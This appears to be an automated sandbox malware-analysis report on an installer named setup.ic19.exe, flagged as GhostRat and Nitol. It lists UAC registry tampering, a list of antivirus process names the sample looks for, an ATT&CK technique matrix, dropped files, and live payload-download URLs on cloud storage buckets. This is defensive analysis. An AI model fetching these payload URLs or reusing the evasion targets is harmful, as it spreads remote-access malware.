Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_00408490 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_00408490

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_00401DA8 GetVersionExA,

4_2_00401DA8

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to modify Windows User Account Control (UAC) settings

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdminEnableLUAPromptOnSecureDesktop		7_2_10002252
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdminEnableLUAPromptOnSecureDesktop		7_2_10008D6B

Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe
Source: lXAMaI.exe	Binary or memory string: C:\Program Files (x86)\360\360Safe\safemon\360tray.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: 8AfroU.exe, 00000004.00000002.2091275422.0000000002978000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lXAMaI.exe PID: 6852, type: MEMORYSTR

Yara detected Nitol

Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lXAMaI.exe PID: 6852, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lXAMaI.exe PID: 6852, type: MEMORYSTR

Yara detected Nitol

Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lXAMaI.exe.43d03e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lXAMaI.exe PID: 6852, type: MEMORYSTR

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035A10A0 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,		7_2_035A10A0
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_036010A0 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,		7_2_036010A0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	12 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	2 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	121 Input Capture	4 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	23 Windows Service	1 Valid Accounts	1 Abuse Elevation Control Mechanism	Security Account Manager	234 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	121 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	23 Windows Service	1 Software Packing	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	22 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	2 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	121 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	22 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Indicator Removal	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
setup.ic19.exe	3%	Virustotal		Browse
setup.ic19.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\lXAMaI\tbcore3U.dll	100%	Avira	HEUR/AGEN.1300189
C:\Program Files (x86)\eL62Gl4\tbcore3U.dll	100%	Avira	HEUR/AGEN.1300189
C:\Program Files (x86)\lXAMaI\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\eL62Gl4\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	0%	ReversingLabs
C:\Program Files (x86)\lXAMaI\lXAMaI.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\AppData\Roaming\8AfroU.exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://101oss.oss-cn-beijing.aliyuncs.com/s.dat	0%	Virustotal		Browse
https://101oss.oss-cn-beijing.aliyuncs.com/b.gif	1%	Virustotal		Browse
https://10mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Virustotal		Browse
https://101oss.oss-cn-beijing.aliyuncs.com/d.gif	1%	Virustotal		Browse
https://10mm.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Virustotal		Browse
https://101oss.oss-cn-beijing.aliyuncs.com/c.gif	1%	Virustotal		Browse
https://101oss.oss-cn-beijing.aliyuncs.com/a.gif	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
http://www.dameware.com/products/dntu/0	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://101oss.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Virustotal		Browse
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Virustotal		Browse
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Virustotal		Browse
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Virustotal		Browse
https://101oss.oss-cn-beijing.aliyuncs.com/i.dat	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-2ikp.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.76	true	false	unknown
sc-2w7a.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.61	true	false	unknown
10mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown
hteyov.net	unknown	unknown	false	unknown
101oss.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://101oss.oss-cn-beijing.aliyuncs.com/s.dat	false	0%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/d.gif	false	1%, Virustotal, Browse	unknown
https://10mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	0%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/b.gif	false	1%, Virustotal, Browse	unknown
https://10mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false	0%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/c.gif	false	1%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/a.gif	false	1%, Virustotal, Browse	unknown
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	0%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/s.jpg	false	0%, Virustotal, Browse	unknown
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false	0%, Virustotal, Browse	unknown
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	0%, Virustotal, Browse	unknown
https://10mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/i.dat	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://%s/%d.dll	lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/b.gifaf	setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://%s/%d.dllC:	lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/a.gifcf	setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Atrebution.sys.0.dr	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000000E.00000002.3216421375.00000000040F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/H	setup.ic19.exe, 00000000.00000003.1900207800.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.c	powershell.exe, 0000000E.00000002.3228787134.0000000007CAD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.3216421375.00000000040F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/a.gift	setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/Psd	setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000609000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002_	setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.thawte.com0	Atrebution.sys.0.dr	false	URL Reputation: safe	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/b.gifcf	setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/a.gifhttps://101oss.oss-cn-beijing.aliyuncs.com/b.gifhttp	setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900269212.0000000000670000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.dameware.com/products/dntu/0	setup.ic19.exe	false	0%, Virustotal, Browse	unknown
https://101oss.oss-cn-beijing.aliyuncs.com/b.gif6	setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/a.gifnf	setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://%s/upx.rarC:	lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://%s/ip.txtC:	lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/7-2476756634-1002	setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000609000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://%s/ip.txt	lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/b.gifhff	setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://%s/upx.rar	lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://101oss.oss-cn-beijing.aliyuncs.com/a.gif6	setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp	false		unknown
